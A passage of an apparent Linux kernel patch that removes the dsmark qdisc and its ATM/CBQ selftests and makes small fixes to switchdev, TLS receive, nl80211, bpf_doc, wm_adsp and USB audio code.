+-					  dsmark_policy, NULL);
+-	if (err < 0)
+-		goto errout;
+-
+-	if (tb[TCA_DSMARK_VALUE])
+-		p->mv[*arg - 1].value = nla_get_u8(tb[TCA_DSMARK_VALUE]);
+-
+-	if (tb[TCA_DSMARK_MASK])
+-		p->mv[*arg - 1].mask = nla_get_u8(tb[TCA_DSMARK_MASK]);
+-
+-	err = 0;
+-
+-errout:
+-	return err;
+-}
+-
+-static int dsmark_delete(struct Qdisc *sch, unsigned long arg,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	if (!dsmark_valid_index(p, arg))
+-		return -EINVAL;
+-
+-	p->mv[arg - 1].mask = 0xff;
+-	p->mv[arg - 1].value = 0;
+-
+-	return 0;
+-}
+-
+-static void dsmark_walk(struct Qdisc *sch, struct qdisc_walker *walker)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	int i;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],walker %p)\n",
+-		 __func__, sch, p, walker);
+-
+-	if (walker->stop)
+-		return;
+-
+-	for (i = 0; i < p->indices; i++) {
+-		if (p->mv[i].mask == 0xff && !p->mv[i].value) {
+-			walker->count++;
+-			continue;
+-		}
+-		if (!tc_qdisc_stats_dump(sch, i + 1, walker))
+-			break;
+-	}
+-}
+-
+-static struct tcf_block *dsmark_tcf_block(struct Qdisc *sch, unsigned long cl,
+-					  struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	return p->block;
+-}
+-
+-/* --------------------------- Qdisc operations ---------------------------- */
+-
+-static int dsmark_enqueue(struct sk_buff *skb, struct Qdisc *sch,
+-			  struct sk_buff **to_free)
+-{
+-	unsigned int len = qdisc_pkt_len(skb);
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	int err;
+-
+-	pr_debug("%s(skb %p,sch %p,[qdisc %p])\n", __func__, skb, sch, p);
+-
+-	if (p->set_tc_index) {
+-		int wlen = skb_network_offset(skb);
+-
+-		switch (skb_protocol(skb, true)) {
+-		case htons(ETH_P_IP):
+-			wlen += sizeof(struct iphdr);
+-			if (!pskb_may_pull(skb, wlen) ||
+-			    skb_try_make_writable(skb, wlen))
+-				goto drop;
+-
+-			skb->tc_index = ipv4_get_dsfield(ip_hdr(skb))
+-				& ~INET_ECN_MASK;
+-			break;
+-
+-		case htons(ETH_P_IPV6):
+-			wlen += sizeof(struct ipv6hdr);
+-			if (!pskb_may_pull(skb, wlen) ||
+-			    skb_try_make_writable(skb, wlen))
+-				goto drop;
+-
+-			skb->tc_index = ipv6_get_dsfield(ipv6_hdr(skb))
+-				& ~INET_ECN_MASK;
+-			break;
+-		default:
+-			skb->tc_index = 0;
+-			break;
+-		}
+-	}
+-
+-	if (TC_H_MAJ(skb->priority) == sch->handle)
+-		skb->tc_index = TC_H_MIN(skb->priority);
+-	else {
+-		struct tcf_result res;
+-		struct tcf_proto *fl = rcu_dereference_bh(p->filter_list);
+-		int result = tcf_classify(skb, NULL, fl, &res, false);
+-
+-		pr_debug("result %d class 0x%04x\n", result, res.classid);
+-
+-		switch (result) {
+-#ifdef CONFIG_NET_CLS_ACT
+-		case TC_ACT_QUEUED:
+-		case TC_ACT_STOLEN:
+-		case TC_ACT_TRAP:
+-			__qdisc_drop(skb, to_free);
+-			return NET_XMIT_SUCCESS | __NET_XMIT_STOLEN;
+-
+-		case TC_ACT_SHOT:
+-			goto drop;
+-#endif
+-		case TC_ACT_OK:
+-			skb->tc_index = TC_H_MIN(res.classid);
+-			break;
+-
+-		default:
+-			if (p->default_index != NO_DEFAULT_INDEX)
+-				skb->tc_index = p->default_index;
+-			break;
+-		}
+-	}
+-
+-	err = qdisc_enqueue(skb, p->q, to_free);
+-	if (err != NET_XMIT_SUCCESS) {
+-		if (net_xmit_drop_count(err))
+-			qdisc_qstats_drop(sch);
+-		return err;
+-	}
+-
+-	sch->qstats.backlog += len;
+-	sch->q.qlen++;
+-
+-	return NET_XMIT_SUCCESS;
+-
+-drop:
+-	qdisc_drop(skb, sch, to_free);
+-	return NET_XMIT_SUCCESS | __NET_XMIT_BYPASS;
+-}
+-
+-static struct sk_buff *dsmark_dequeue(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct sk_buff *skb;
+-	u32 index;
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	skb = qdisc_dequeue_peeked(p->q);
+-	if (skb == NULL)
+-		return NULL;
+-
+-	qdisc_bstats_update(sch, skb);
+-	qdisc_qstats_backlog_dec(sch, skb);
+-	sch->q.qlen--;
+-
+-	index = skb->tc_index & (p->indices - 1);
+-	pr_debug("index %d->%d\n", skb->tc_index, index);
+-
+-	switch (skb_protocol(skb, true)) {
+-	case htons(ETH_P_IP):
+-		ipv4_change_dsfield(ip_hdr(skb), p->mv[index].mask,
+-				    p->mv[index].value);
+-			break;
+-	case htons(ETH_P_IPV6):
+-		ipv6_change_dsfield(ipv6_hdr(skb), p->mv[index].mask,
+-				    p->mv[index].value);
+-			break;
+-	default:
+-		/*
+-		 * Only complain if a change was actually attempted.
+-		 * This way, we can send non-IP traffic through dsmark
+-		 * and don't need yet another qdisc as a bypass.
+-		 */
+-		if (p->mv[index].mask != 0xff || p->mv[index].value)
+-			pr_warn("%s: unsupported protocol %d\n",
+-				__func__, ntohs(skb_protocol(skb, true)));
+-		break;
+-	}
+-
+-	return skb;
+-}
+-
+-static struct sk_buff *dsmark_peek(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	return p->q->ops->peek(p->q);
+-}
+-
+-static int dsmark_init(struct Qdisc *sch, struct nlattr *opt,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *tb[TCA_DSMARK_MAX + 1];
+-	int err = -EINVAL;
+-	u32 default_index = NO_DEFAULT_INDEX;
+-	u16 indices;
+-	int i;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],opt %p)\n", __func__, sch, p, opt);
+-
+-	if (!opt)
+-		goto errout;
+-
+-	err = tcf_block_get(&p->block, &p->filter_list, sch, extack);
+-	if (err)
+-		return err;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_DSMARK_MAX, opt,
+-					  dsmark_policy, NULL);
+-	if (err < 0)
+-		goto errout;
+-
+-	err = -EINVAL;
+-	if (!tb[TCA_DSMARK_INDICES])
+-		goto errout;
+-	indices = nla_get_u16(tb[TCA_DSMARK_INDICES]);
+-
+-	if (hweight32(indices) != 1)
+-		goto errout;
+-
+-	if (tb[TCA_DSMARK_DEFAULT_INDEX])
+-		default_index = nla_get_u16(tb[TCA_DSMARK_DEFAULT_INDEX]);
+-
+-	if (indices <= DSMARK_EMBEDDED_SZ)
+-		p->mv = p->embedded;
+-	else
+-		p->mv = kmalloc_array(indices, sizeof(*p->mv), GFP_KERNEL);
+-	if (!p->mv) {
+-		err = -ENOMEM;
+-		goto errout;
+-	}
+-	for (i = 0; i < indices; i++) {
+-		p->mv[i].mask = 0xff;
+-		p->mv[i].value = 0;
+-	}
+-	p->indices = indices;
+-	p->default_index = default_index;
+-	p->set_tc_index = nla_get_flag(tb[TCA_DSMARK_SET_TC_INDEX]);
+-
+-	p->q = qdisc_create_dflt(sch->dev_queue, &pfifo_qdisc_ops, sch->handle,
+-				 NULL);
+-	if (p->q == NULL)
+-		p->q = &noop_qdisc;
+-	else
+-		qdisc_hash_add(p->q, true);
+-
+-	pr_debug("%s: qdisc %p\n", __func__, p->q);
+-
+-	err = 0;
+-errout:
+-	return err;
+-}
+-
+-static void dsmark_reset(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-	if (p->q)
+-		qdisc_reset(p->q);
+-}
+-
+-static void dsmark_destroy(struct Qdisc *sch)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-
+-	pr_debug("%s(sch %p,[qdisc %p])\n", __func__, sch, p);
+-
+-	tcf_block_put(p->block);
+-	qdisc_put(p->q);
+-	if (p->mv != p->embedded)
+-		kfree(p->mv);
+-}
+-
+-static int dsmark_dump_class(struct Qdisc *sch, unsigned long cl,
+-			     struct sk_buff *skb, struct tcmsg *tcm)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opts = NULL;
+-
+-	pr_debug("%s(sch %p,[qdisc %p],class %ld\n", __func__, sch, p, cl);
+-
+-	if (!dsmark_valid_index(p, cl))
+-		return -EINVAL;
+-
+-	tcm->tcm_handle = TC_H_MAKE(TC_H_MAJ(sch->handle), cl - 1);
+-	tcm->tcm_info = p->q->handle;
+-
+-	opts = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (opts == NULL)
+-		goto nla_put_failure;
+-	if (nla_put_u8(skb, TCA_DSMARK_MASK, p->mv[cl - 1].mask) ||
+-	    nla_put_u8(skb, TCA_DSMARK_VALUE, p->mv[cl - 1].value))
+-		goto nla_put_failure;
+-
+-	return nla_nest_end(skb, opts);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, opts);
+-	return -EMSGSIZE;
+-}
+-
+-static int dsmark_dump(struct Qdisc *sch, struct sk_buff *skb)
+-{
+-	struct dsmark_qdisc_data *p = qdisc_priv(sch);
+-	struct nlattr *opts = NULL;
+-
+-	opts = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (opts == NULL)
+-		goto nla_put_failure;
+-	if (nla_put_u16(skb, TCA_DSMARK_INDICES, p->indices))
+-		goto nla_put_failure;
+-
+-	if (p->default_index != NO_DEFAULT_INDEX &&
+-	    nla_put_u16(skb, TCA_DSMARK_DEFAULT_INDEX, p->default_index))
+-		goto nla_put_failure;
+-
+-	if (p->set_tc_index &&
+-	    nla_put_flag(skb, TCA_DSMARK_SET_TC_INDEX))
+-		goto nla_put_failure;
+-
+-	return nla_nest_end(skb, opts);
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, opts);
+-	return -EMSGSIZE;
+-}
+-
+-static const struct Qdisc_class_ops dsmark_class_ops = {
+-	.graft		=	dsmark_graft,
+-	.leaf		=	dsmark_leaf,
+-	.find		=	dsmark_find,
+-	.change		=	dsmark_change,
+-	.delete		=	dsmark_delete,
+-	.walk		=	dsmark_walk,
+-	.tcf_block	=	dsmark_tcf_block,
+-	.bind_tcf	=	dsmark_bind_filter,
+-	.unbind_tcf	=	dsmark_unbind_filter,
+-	.dump		=	dsmark_dump_class,
+-};
+-
+-static struct Qdisc_ops dsmark_qdisc_ops __read_mostly = {
+-	.next		=	NULL,
+-	.cl_ops		=	&dsmark_class_ops,
+-	.id		=	"dsmark",
+-	.priv_size	=	sizeof(struct dsmark_qdisc_data),
+-	.enqueue	=	dsmark_enqueue,
+-	.dequeue	=	dsmark_dequeue,
+-	.peek		=	dsmark_peek,
+-	.init		=	dsmark_init,
+-	.reset		=	dsmark_reset,
+-	.destroy	=	dsmark_destroy,
+-	.change		=	NULL,
+-	.dump		=	dsmark_dump,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init dsmark_module_init(void)
+-{
+-	return register_qdisc(&dsmark_qdisc_ops);
+-}
+-
+-static void __exit dsmark_module_exit(void)
+-{
+-	unregister_qdisc(&dsmark_qdisc_ops);
+-}
+-
+-module_init(dsmark_module_init)
+-module_exit(dsmark_module_exit)
+-
+-MODULE_LICENSE("GPL");
+diff --git a/net/switchdev/switchdev.c b/net/switchdev/switchdev.c
+index 8cc42aea19c7e..2e14d4c37e2dc 100644
+--- a/net/switchdev/switchdev.c
++++ b/net/switchdev/switchdev.c
+@@ -19,6 +19,35 @@
+ #include <linux/rtnetlink.h>
+ #include <net/switchdev.h>
+ 
++static bool switchdev_obj_eq(const struct switchdev_obj *a,
++			     const struct switchdev_obj *b)
++{
++	const struct switchdev_obj_port_vlan *va, *vb;
++	const struct switchdev_obj_port_mdb *ma, *mb;
++
++	if (a->id != b->id || a->orig_dev != b->orig_dev)
++		return false;
++
++	switch (a->id) {
++	case SWITCHDEV_OBJ_ID_PORT_VLAN:
++		va = SWITCHDEV_OBJ_PORT_VLAN(a);
++		vb = SWITCHDEV_OBJ_PORT_VLAN(b);
++		return va->flags == vb->flags &&
++			va->vid == vb->vid &&
++			va->changed == vb->changed;
++	case SWITCHDEV_OBJ_ID_PORT_MDB:
++	case SWITCHDEV_OBJ_ID_HOST_MDB:
++		ma = SWITCHDEV_OBJ_PORT_MDB(a);
++		mb = SWITCHDEV_OBJ_PORT_MDB(b);
++		return ma->vid == mb->vid &&
++			ether_addr_equal(ma->addr, mb->addr);
++	default:
++		break;
++	}
++
++	BUG();
++}
++
+ static LIST_HEAD(deferred);
+ static DEFINE_SPINLOCK(deferred_lock);
+ 
+@@ -307,6 +336,50 @@ int switchdev_port_obj_del(struct net_device *dev,
+ }
+ EXPORT_SYMBOL_GPL(switchdev_port_obj_del);
+ 
++/**
++ *	switchdev_port_obj_act_is_deferred - Is object action pending?
++ *
++ *	@dev: port device
++ *	@nt: type of action; add or delete
++ *	@obj: object to test
++ *
++ *	Returns true if a deferred item is pending, which is
++ *	equivalent to the action @nt on an object @obj.
++ *
++ *	rtnl_lock must be held.
++ */
++bool switchdev_port_obj_act_is_deferred(struct net_device *dev,
++					enum switchdev_notifier_type nt,
++					const struct switchdev_obj *obj)
++{
++	struct switchdev_deferred_item *dfitem;
++	bool found = false;
++
++	ASSERT_RTNL();
++
++	spin_lock_bh(&deferred_lock);
++
++	list_for_each_entry(dfitem, &deferred, list) {
++		if (dfitem->dev != dev)
++			continue;
++
++		if ((dfitem->func == switchdev_port_obj_add_deferred &&
++		     nt == SWITCHDEV_PORT_OBJ_ADD) ||
++		    (dfitem->func == switchdev_port_obj_del_deferred &&
++		     nt == SWITCHDEV_PORT_OBJ_DEL)) {
++			if (switchdev_obj_eq((const void *)dfitem->data, obj)) {
++				found = true;
++				break;
++			}
++		}
++	}
++
++	spin_unlock_bh(&deferred_lock);
++
++	return found;
++}
++EXPORT_SYMBOL_GPL(switchdev_port_obj_act_is_deferred);
++
+ static ATOMIC_NOTIFIER_HEAD(switchdev_notif_chain);
+ static BLOCKING_NOTIFIER_HEAD(switchdev_blocking_notif_chain);
+ 
+diff --git a/net/tls/tls_main.c b/net/tls/tls_main.c
+index 80b42a3e78830..6b7189a520af7 100644
+--- a/net/tls/tls_main.c
++++ b/net/tls/tls_main.c
+@@ -1098,7 +1098,7 @@ static u16 tls_user_config(struct tls_context *ctx, bool tx)
+ 	return 0;
+ }
+ 
+-static int tls_get_info(const struct sock *sk, struct sk_buff *skb)
++static int tls_get_info(struct sock *sk, struct sk_buff *skb)
+ {
+ 	u16 version, cipher_type;
+ 	struct tls_context *ctx;
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index c8cbdd02a784e..93e1bfa72d791 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -1845,7 +1845,8 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 			   u8 *control,
+ 			   size_t skip,
+ 			   size_t len,
+-			   bool is_peek)
++			   bool is_peek,
++			   bool *more)
+ {
+ 	struct sk_buff *skb = skb_peek(&ctx->rx_list);
+ 	struct tls_msg *tlm;
+@@ -1858,7 +1859,7 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ 		err = tls_record_content_type(msg, tlm, control);
+ 		if (err <= 0)
+-			goto out;
++			goto more;
+ 
+ 		if (skip < rxm->full_len)
+ 			break;
+@@ -1876,12 +1877,12 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ 		err = tls_record_content_type(msg, tlm, control);
+ 		if (err <= 0)
+-			goto out;
++			goto more;
+ 
+ 		err = skb_copy_datagram_msg(skb, rxm->offset + skip,
+ 					    msg, chunk);
+ 		if (err < 0)
+-			goto out;
++			goto more;
+ 
+ 		len = len - chunk;
+ 		copied = copied + chunk;
+@@ -1917,6 +1918,10 @@ static int process_rx_list(struct tls_sw_context_rx *ctx,
+ 
+ out:
+ 	return copied ? : err;
++more:
++	if (more)
++		*more = true;
++	goto out;
+ }
+ 
+ static bool
+@@ -2020,6 +2025,7 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	int target, err;
+ 	bool is_kvec = iov_iter_is_kvec(&msg->msg_iter);
+ 	bool is_peek = flags & MSG_PEEK;
++	bool rx_more = false;
+ 	bool released = true;
+ 	bool bpf_strp_enabled;
+ 	bool zc_capable;
+@@ -2039,12 +2045,12 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		goto end;
+ 
+ 	/* Process pending decrypted records. It must be non-zero-copy */
+-	err = process_rx_list(ctx, msg, &control, 0, len, is_peek);
++	err = process_rx_list(ctx, msg, &control, 0, len, is_peek, &rx_more);
+ 	if (err < 0)
+ 		goto end;
+ 
+ 	copied = err;
+-	if (len <= copied)
++	if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA) || rx_more)
+ 		goto end;
+ 
+ 	target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
+@@ -2137,6 +2143,8 @@ int tls_sw_recvmsg(struct sock *sk,
+ 				decrypted += chunk;
+ 				len -= chunk;
+ 				__skb_queue_tail(&ctx->rx_list, skb);
++				if (unlikely(control != TLS_RECORD_TYPE_DATA))
++					break;
+ 				continue;
+ 			}
+ 
+@@ -2201,10 +2209,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 		/* Drain records from the rx_list & copy if required */
+ 		if (is_peek || is_kvec)
+ 			err = process_rx_list(ctx, msg, &control, copied,
+-					      decrypted, is_peek);
++					      decrypted, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+-					      async_copy_bytes, is_peek);
++					      async_copy_bytes, is_peek, NULL);
+ 	}
+ 
+ 	copied += decrypted;
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 70fb14b8bab07..c259d3227a9e2 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -3960,6 +3960,7 @@ static int nl80211_dump_interface(struct sk_buff *skb, struct netlink_callback *
+ 			if_idx++;
+ 		}
+ 
++		if_start = 0;
+ 		wp_idx++;
+ 	}
+  out:
+diff --git a/scripts/bpf_doc.py b/scripts/bpf_doc.py
+index d5c389df6045e..4de98b7bbea95 100755
+--- a/scripts/bpf_doc.py
++++ b/scripts/bpf_doc.py
+@@ -495,7 +495,7 @@ eBPF programs can have an associated license, passed along with the bytecode
+ instructions to the kernel when the programs are loaded. The format for that
+ string is identical to the one in use for kernel modules (Dual licenses, such
+ as "Dual BSD/GPL", may be used). Some helper functions are only accessible to
+-programs that are compatible with the GNU Privacy License (GPL).
++programs that are compatible with the GNU General Public License (GNU GPL).
+ 
+ In order to use such helpers, the eBPF program must be loaded with the correct
+ license string passed (via **attr**) to the **bpf**\ () system call, and this
+diff --git a/sound/soc/codecs/wm_adsp.c b/sound/soc/codecs/wm_adsp.c
+index 2cfca78f0401f..47a4c363227cc 100644
+--- a/sound/soc/codecs/wm_adsp.c
++++ b/sound/soc/codecs/wm_adsp.c
+@@ -740,19 +740,25 @@ static int wm_adsp_request_firmware_file(struct wm_adsp *dsp,
+ 					 const char *filetype)
+ {
+ 	struct cs_dsp *cs_dsp = &dsp->cs_dsp;
++	const char *fwf;
+ 	char *s, c;
+ 	int ret = 0;
+ 
++	if (dsp->fwf_name)
++		fwf = dsp->fwf_name;
++	else
++		fwf = dsp->cs_dsp.name;
++
+ 	if (system_name && asoc_component_prefix)
+ 		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s-%s-%s.%s", dir, dsp->part,
+-				      dsp->fwf_name, wm_adsp_fw[dsp->fw].file, system_name,
++				      fwf, wm_adsp_fw[dsp->fw].file, system_name,
+ 				      asoc_component_prefix, filetype);
+ 	else if (system_name)
+ 		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s-%s.%s", dir, dsp->part,
+-				      dsp->fwf_name, wm_adsp_fw[dsp->fw].file, system_name,
++				      fwf, wm_adsp_fw[dsp->fw].file, system_name,
+ 				      filetype);
+ 	else
+-		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s.%s", dir, dsp->part, dsp->fwf_name,
++		*filename = kasprintf(GFP_KERNEL, "%s%s-%s-%s.%s", dir, dsp->part, fwf,
+ 				      wm_adsp_fw[dsp->fw].file, filetype);
+ 
+ 	if (*filename == NULL)
+@@ -842,29 +848,18 @@ static int wm_adsp_request_firmware_files(struct wm_adsp *dsp,
+ 	}
+ 
+ 	adsp_err(dsp, "Failed to request firmware <%s>%s-%s-%s<-%s<%s>>.wmfw\n",
+-		 cirrus_dir, dsp->part, dsp->fwf_name, wm_adsp_fw[dsp->fw].file,
+-		 system_name, asoc_component_prefix);
++		 cirrus_dir, dsp->part,
++		 dsp->fwf_name ? dsp->fwf_name : dsp->cs_dsp.name,
++		 wm_adsp_fw[dsp->fw].file, system_name, asoc_component_prefix);
+ 
+ 	return -ENOENT;
+ }
+ 
+ static int wm_adsp_common_init(struct wm_adsp *dsp)
+ {
+-	char *p;
+-
+ 	INIT_LIST_HEAD(&dsp->compr_list);
+ 	INIT_LIST_HEAD(&dsp->buffer_list);
+ 
+-	if (!dsp->fwf_name) {
+-		p = devm_kstrdup(dsp->cs_dsp.dev, dsp->cs_dsp.name, GFP_KERNEL);
+-		if (!p)
+-			return -ENOMEM;
+-
+-		dsp->fwf_name = p;
+-		for (; *p != 0; ++p)
+-			*p = tolower(*p);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/sound/soc/sunxi/sun4i-spdif.c b/sound/soc/sunxi/sun4i-spdif.c
+index bcceebca915ac..484b0e7c2defa 100644
+--- a/sound/soc/sunxi/sun4i-spdif.c
++++ b/sound/soc/sunxi/sun4i-spdif.c
+@@ -578,6 +578,11 @@ static const struct of_device_id sun4i_spdif_of_match[] = {
+ 		.compatible = "allwinner,sun50i-h6-spdif",
+ 		.data = &sun50i_h6_spdif_quirks,
+ 	},
++	{
++		.compatible = "allwinner,sun50i-h616-spdif",
++		/* Essentially the same as the H6, but without RX */
++		.data = &sun50i_h6_spdif_quirks,
++	},
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, sun4i_spdif_of_match);
+diff --git a/sound/usb/clock.c b/sound/usb/clock.c
+index 33db334e65566..a676ad093d189 100644
+--- a/sound/usb/clock.c
++++ b/sound/usb/clock.c
+@@ -328,8 +328,16 @@ static int __uac_clock_find_source(struct snd_usb_audio *chip,
+ 			if (chip->quirk_flags & QUIRK_FLAG_SKIP_CLOCK_SELECTOR)
+ 				return ret;
+ 			err = uac_clock_selector_set_val(chip, entity_id, cur);
+-			if (err < 0)
++			if (err < 0) {
++				if (pins == 1) {
++					usb_audio_dbg(chip,
++						      "%s(): selector returned an error, "
++						      "assuming a firmware bug, id %d, ret %d\n",
++						      __func__, clock_id, err);
++					return ret;
++				}
+ 				return err;
++			}
+ 		}
+ 
+ 		if (!validate || ret > 0 || !chip->autoclock)
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index ab5fed9f55b60..3b45d0ee76938 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -470,9 +470,11 @@ static int validate_sample_rate_table_v2v3(struct snd_usb_audio *chip,
+ 					   int clock)
+ {
+ 	struct usb_device *dev = chip->dev;
++	struct usb_host_interface *alts;
+ 	unsigned int *table;
+ 	unsigned int nr_rates;
+ 	int i, err;
++	u32 bmControls;
+ 
+ 	/* performing the rate verification may lead to unexpected USB bus
+ 	 * behavior afterwards by some unknown reason.  Do this only for the
+@@ -481,6 +483,24 @@ static int validate_sample_rate_table_v2v3(struct snd_usb_audio *chip,
+ 	if (!(chip->quirk_flags & QUIRK_FLAG_VALIDATE_RATES))
+ 		return 0; /* don't perform the validation as default */
+ 
++	alts = snd_usb_get_host_interface(chip, fp->iface, fp->altsetting);
++	if (!alts)
++		return 0;
++
++	if (fp->protocol == UAC_VERSION_3) {
++		struct uac3_as_header_descriptor *as = snd_usb_find_csint_desc(
++				alts->extra, alts->extralen, NULL, UAC_AS_GENERAL);
++		bmControls = le32_to_cpu(as->bmControls);
++	} else {
++		struct uac2_as_header_descriptor *as = snd_usb_find_csint_desc(
++				alts->extra, alts->extralen, NULL, UAC_AS_GENERAL);
++		bmControls = as->bmControls;
++	}
++
++	if (!uac_v2v3_control_is_readable(bmControls,
++				UAC2_AS_VAL_ALT_SETTINGS))
++		return 0;
++
+ 	table = kcalloc(fp->nr_rates, sizeof(*table), GFP_KERNEL);
+ 	if (!table)
+ 		return -ENOMEM;
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json
+deleted file mode 100644
+index f5bc8670a67d1..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/atm.json
++++ /dev/null
+@@ -1,94 +0,0 @@
+-[
+-    {
+-        "id": "7628",
+-        "name": "Create ATM with default setting",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "390a",
+-        "name": "Delete ATM with valid handle",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root atm"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "32a0",
+-        "name": "Show ATM class",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class atm 1: parent 1:",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "6310",
+-        "name": "Dump ATM stats",
+-        "category": [
+-            "qdisc",
+-            "atm"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root atm",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC -s qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc atm 1: root refcnt",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json
+deleted file mode 100644
+index 1ab21c83a1223..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/cbq.json
++++ /dev/null
+@@ -1,184 +0,0 @@
+-[
+-    {
+-        "id": "3460",
+-        "name": "Create CBQ with default setting",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "0592",
+-        "name": "Create CBQ with mpu",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 mpu 1000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
